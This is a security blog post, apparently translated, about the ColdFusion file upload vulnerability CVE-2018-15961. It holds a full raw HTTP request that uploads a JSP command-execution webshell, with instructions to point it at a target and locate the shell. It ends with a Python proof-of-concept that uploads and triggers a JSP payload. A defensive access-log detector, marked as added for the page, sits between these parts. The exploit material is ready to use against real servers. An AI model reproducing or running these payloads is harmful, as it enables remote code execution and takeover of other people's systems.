Adobe ColdFusion Unrestricted File Upload Vulnerability(CVE-2018-15961)

Adobe's latest bulletin notes that CVE-2018-15961 is being exploited in the wild: https://helpx.adobe.com/security/products/coldfusion/apsb18-33.html. The earliest public analysis I found is https://www.volexity.com/blog/2018/11/08/active-exploitation-of-newly-patched-coldfusion-vulnerability-cve-2018-15961/, but it does not show the actual POST request. I set up a local environment, captured the traffic, and got the POST request that ultimately gets a shell:

POST /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/upload.cfm HTTP/1.1
Host: 172.16.59.130:8500
Content-Length: 1115
Cache-Control: max-age=0
Origin: http://172.16.59.130:8500
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarynLGnAOgQ8df3hQ61
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://172.16.59.130:8500/cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/filemanager.cfm
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7
Cookie: JSESSIONID=E69D416EB891D3E7CDBF0FE787F13E79.cfusion
Connection: close

------WebKitFormBoundarynLGnAOgQ8df3hQ61
Content-Disposition: form-data; name="file"; filename="test.jsp"
Content-Type: application/octet-stream

<%@ page import="java.util.*,java.io.*"%>
<%
//
// JSP_KIT
//
// cmd.jsp = Command Execution (unix)
//
// by: Unknown
// modified: 27/06/2003
//
%>
<HTML><BODY>
<FORM METHOD="GET" NAME="myform" ACTION="">
<INPUT TYPE="text" NAME="cmd">
<INPUT TYPE="submit" VALUE="Send">
</FORM>
<pre>
<%
if (request.getParameter("cmd") != null) {
        out.println("Command: " + request.getParameter("cmd") + "<BR>");
        Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));
        OutputStream os = p.getOutputStream();
        InputStream in = p.getInputStream();
        DataInputStream dis = new DataInputStream(in);
        String disr = dis.readLine();
        while ( disr != null ) {
                out.println(disr); 
                disr = dis.readLine(); 
                }
        }
%>
</pre>
</BODY></HTML>

------WebKitFormBoundarynLGnAOgQ8df3hQ61
Content-Disposition: form-data; name="path"

1
------WebKitFormBoundarynLGnAOgQ8df3hQ61--

Change the Host to your target. Note that the path parameter must be specified. After a successful upload, an uploadedFiles directory is created under the filemanager directory, and the uploaded webshell is placed there. A default ColdFusion deployment also has a directory-listing vulnerability, so finding the uploaded file is not hard. If a file with the same name xxoo.jsp already exists in uploadedFiles, the newly uploaded file is renamed to xxoo1.jsp, xx002.jsp, and so on.
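The two request shapes described above (a POST to the CKEditor filemanager upload.cfm, then a GET of a server-executable file under uploadedFiles/) are what a defender would hunt for in web server access logs. The following detector is an added example written for this page, not code from the original post or from Adobe; the log lines are constructed samples in combined log format, and the list of "executable" extensions is an assumption about what a ColdFusion/Tomcat stack would run server-side. It also catches the renamed copies (poc1.jsp, poc2.jsp) the text mentions, because only the extension is checked.

```python
import re
from urllib.parse import urlsplit

# Constructed sample access-log lines in combined format; illustrative only,
# not captured from any real server.
SAMPLE_LOG = """\
172.16.59.1 - - [20/Nov/2018:10:01:02 +0000] "POST /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/upload.cfm?action=upload HTTP/1.1" 200 512 "-" "Mozilla/5.0"
172.16.59.1 - - [20/Nov/2018:10:01:05 +0000] "GET /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/uploadedFiles/poc.jsp?cmd=id HTTP/1.1" 200 220 "-" "Mozilla/5.0"
172.16.59.1 - - [20/Nov/2018:10:01:09 +0000] "GET /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/uploadedFiles/poc1.jsp HTTP/1.1" 200 220 "-" "Mozilla/5.0"
172.16.59.1 - - [20/Nov/2018:10:02:00 +0000] "GET /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/uploadedFiles/logo.png HTTP/1.1" 200 4096 "-" "Mozilla/5.0"
172.16.59.1 - - [20/Nov/2018:10:03:00 +0000] "GET /index.cfm HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
this line is not an access-log record
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" (?P<status>\d{3}) '
)

FILEMANAGER = "/cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/"
# Assumption: extensions the ColdFusion/Tomcat stack executes server-side.
SCRIPT_EXTENSIONS = (".jsp", ".jspx", ".cfm", ".cfml", ".cfc")


def classify(line):
    """Classify one access-log line.

    Returns a dict (kind, ip, ts, status, path) for the two indicators:
      "upload_attempt" - POST to the CKEditor filemanager upload.cfm
      "script_fetch"   - GET of a server-executable file under uploadedFiles/
    Returns None for unparsable lines and for benign requests.
    """
    m = LOG_RE.match(line)
    if not m:
        return None
    path = urlsplit(m["target"]).path  # drop the query string
    lowered = path.lower()
    if not lowered.startswith(FILEMANAGER):
        return None
    rest = lowered[len(FILEMANAGER):]
    kind = None
    if m["method"] == "POST" and rest == "upload.cfm":
        kind = "upload_attempt"
    elif rest.startswith("uploadedfiles/") and rest.endswith(SCRIPT_EXTENSIONS):
        # Renamed copies (poc1.jsp, poc2.jsp, ...) match too: only the
        # extension is inspected, not the base name.
        kind = "script_fetch"
    if kind is None:
        return None
    return {"kind": kind, "ip": m["ip"], "ts": m["ts"],
            "status": int(m["status"]), "path": path}


def find_indicators(log_text):
    """Run classify() over every line and return the hits in log order."""
    return [hit for hit in map(classify, log_text.splitlines()) if hit]


if __name__ == "__main__":
    for hit in find_indicators(SAMPLE_LOG):
        print("{kind:15} {ip:15} {status} {path}".format(**hit))
```

A POST hit followed within seconds by a script_fetch from the same source address is the sequence the captured request above produces; a 200 on the script_fetch is the stronger signal, since it means the file was both written and executed by the server.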

Finally, I hope everyone stays mindful of their own safety when researching this vulnerability. Several foreign media outlets have already suggested that this round of exploitation looks like a Chinese APT attack, and someone used the vulnerability to upload China Chopper (菜刀).

#update 2018-11-20 Adding the Python version of the PoC:

import httplib
import sys


def parse_args(argv):
    # Added here: the original snippet calls parse_args() without defining it.
    # Expects: poc.py <host> <port>
    if len(argv) < 3:
        print "Usage: %s <host> <port>" % argv[0]
        sys.exit(1)
    return {'host': argv[1], 'port': int(argv[2])}


def main(argv):

    print "Proof of Concept"
    print "Copyright Trend Micro Security Research"
    print "All Rights Reserved.\n"

    args = parse_args(argv)

    host = args['host']
    port = args['port']

    # Upload file
    CRLF = "\r\n"

    # Multipart body: the "path" part must be present, then the file part
    body = '--XX' + CRLF
    body += 'Content-Disposition: form-data; name="path"' + CRLF
    body += CRLF
    body += '/home/' + CRLF
    body += '--XX' + CRLF
    body += 'Content-Disposition: form-data; name="file"; filename="poc.jsp"' + CRLF
    body += 'Content-Type: application/octet-stream' + CRLF
    body += CRLF
    body += '''<%@ page import="java.util.*, java.io.*" %>
<% Runtime run = Runtime.getRuntime();
Process p = run.exec("calc.exe");
try{ p.waitFor(); }
catch(InterruptedException e)
{ System.out.println(e); } %> ''' + CRLF
    body += "--XX--"
    lenn = str(len(body))

    headers = {"Accept": "*/*",
               "Connection": "keep-alive",
               "Host": host + ":" + str(port),
               "Content-Length": "" + lenn,
               "Content-Type": "multipart/form-data; boundary=XX"}
    conN = httplib.HTTPConnection(host + ":" + str(port))
    print "[*] Uploading .jsp file to server..."
    conN.request("POST", "/cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/upload.cfm?action=upload", body, headers)
    response = conN.getresponse()
    buf = response.read()

    # Request the uploaded file so the server compiles and runs it
    print "[*] Requesting uploaded .jsp file..."
    conN = httplib.HTTPConnection(host + ":" + str(port))
    conN.request("GET", "/cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/uploadedFiles/poc.jsp")
    print "[*] Check the server to see if CVE-2018-15961 has been triggered.\n"


if __name__ == "__main__":
    main(sys.argv)